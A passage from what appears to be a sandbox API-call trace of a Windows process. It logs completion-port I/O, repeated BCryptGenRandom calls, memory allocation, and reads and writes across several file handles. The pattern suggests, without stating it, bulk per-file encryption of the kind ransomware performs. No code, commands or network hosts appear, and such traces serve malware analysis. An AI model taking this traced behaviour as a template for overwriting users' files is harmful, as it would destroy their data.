(_Block=0x3d70450) [0115.825] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0115.834] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.835] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0115.835] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.835] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.835] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0115.836] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0115.836] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0115.836] free (_Block=0x77d7a8) [0115.836] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0115.836] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0115.836] free (_Block=0x2071c20) [0115.836] free (_Block=0x2071d30) [0115.836] free (_Block=0x77d8b0) [0115.836] WriteFile (in: hFile=0x81c, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0115.837] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0115.839] WriteFile (in: hFile=0x340, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x32a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0115.839] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0115.841] CloseHandle (hObject=0x81c) returned 1 [0115.843] free (_Block=0x3ef0008) [0115.843] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0115.861] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.861] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0115.861] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0115.862] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0115.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0115.862] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0115.862] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0115.862] free (_Block=0x77d7a8) [0115.862] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0115.862] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0115.863] free (_Block=0x2071c20) [0115.863] free (_Block=0x2071d30) [0115.863] free (_Block=0x77d8b0) [0115.863] WriteFile (in: hFile=0x13c0, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0115.863] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0115.864] WriteFile (in: hFile=0x13c0, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x890, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0115.864] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0116.225] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x112c, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0116.243] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0116.243] CloseHandle (hObject=0x13c0) returned 1 [0116.244] free (_Block=0x1ff1e60) [0116.244] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0116.254] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.254] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.254] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0116.254] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.255] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.255] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0116.255] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0116.255] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0116.255] free (_Block=0x77d7a8) [0116.255] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0116.260] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0116.260] free (_Block=0x2071c20) [0116.260] free (_Block=0x2071d30) [0116.260] free (_Block=0x77d8b0) [0116.260] WriteFile (in: hFile=0x81c, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0116.261] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0116.317] ReadFile (in: hFile=0x81c, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xe70, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0116.317] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0116.325] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0116.326] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0116.327] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0116.327] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0116.327] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0116.327] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0116.327] free (_Block=0x77d7a8) [0116.327] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0116.327] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0116.328] free (_Block=0x2071c20) [0116.328] free (_Block=0x2071d30) [0116.328] free (_Block=0x77d8b0) [0116.328] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0116.328] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.023] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x670, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0117.023] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.023] CloseHandle (hObject=0x340) returned 1 [0117.024] free (_Block=0x3d70450) [0117.025] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.026] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1510, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.026] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.058] ReadFile (in: hFile=0x81c, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0xc38, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0117.058] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.058] CloseHandle (hObject=0x81c) returned 1 [0117.064] free (_Block=0x3e70008) [0117.064] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.174] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.174] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0117.174] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.175] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.175] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0117.175] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.175] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.175] free (_Block=0x77d7a8) [0117.175] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.175] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.176] free (_Block=0x2071c20) [0117.176] free (_Block=0x2071d30) [0117.176] free (_Block=0x77d8b0) [0117.176] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.176] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.177] WriteFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x32c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.177] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.668] ReadFile (in: hFile=0x2f4, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x8b8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 1 [0117.668] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.668] CloseHandle (hObject=0x2f4) returned 1 [0117.672] free (_Block=0x3db04c0) [0117.676] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.693] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.694] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0117.694] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.694] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.694] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0117.695] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.695] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.695] free (_Block=0x77d7a8) [0117.695] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.695] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.695] free (_Block=0x2071c20) [0117.695] free (_Block=0x2071d30) [0117.695] free (_Block=0x77d8b0) [0117.695] WriteFile (in: hFile=0x2f4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.696] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.705] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.705] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.706] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0117.706] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.706] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.706] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0117.706] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.706] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.706] free (_Block=0x77d7a8) [0117.706] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.706] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.707] free (_Block=0x2071c20) [0117.707] free (_Block=0x2071d30) [0117.707] free (_Block=0x77d8b0) [0117.707] WriteFile (in: hFile=0x13c0, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0117.707] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.715] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.715] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.715] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0117.715] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.716] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.716] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0117.716] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.716] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.716] free (_Block=0x77d7a8) [0117.716] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.716] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.717] free (_Block=0x2071c20) [0117.717] free (_Block=0x2071d30) [0117.717] free (_Block=0x77d8b0) [0117.717] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0117.717] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.778] CloseHandle (hObject=0x340) returned 1 [0117.780] free (_Block=0x3d70450) [0117.780] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.791] CloseHandle (hObject=0x2f4) returned 1 [0117.792] free (_Block=0x1ff1e60) [0117.792] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.795] CloseHandle (hObject=0x13c0) returned 1 [0117.796] free (_Block=0x3e70008) [0117.796] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.797] WriteFile (in: hFile=0x3bc, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0xcf0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0117.797] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.811] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x332, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0117.812] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.812] CloseHandle (hObject=0x340) returned 1 [0117.813] free (_Block=0x3d70450) [0117.813] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.833] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.834] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0117.834] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.834] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.834] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0117.835] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.835] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.835] free (_Block=0x77d7a8) [0117.835] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.835] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.835] free (_Block=0x2071c20) [0117.835] free (_Block=0x2071d30) [0117.836] free (_Block=0x77d8b0) [0117.836] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0117.836] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.843] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.844] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0117.844] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.844] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.844] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0117.845] calloc (_Count=0x40, _Size=0x4) returned 0x77d7a8 [0117.845] calloc (_Count=0x41, _Size=0x4) returned 0x77d8b0 [0117.845] free (_Block=0x77d7a8) [0117.845] calloc (_Count=0x41, _Size=0x4) returned 0x2071c20 [0117.845] calloc (_Count=0x82, _Size=0x4) returned 0x2071d30 [0117.845] free (_Block=0x2071c20) [0117.845] free (_Block=0x2071d30) [0117.845] free (_Block=0x77d8b0) [0117.845] WriteFile (in: hFile=0x340, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0117.846] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0117.846] WriteFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3960, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 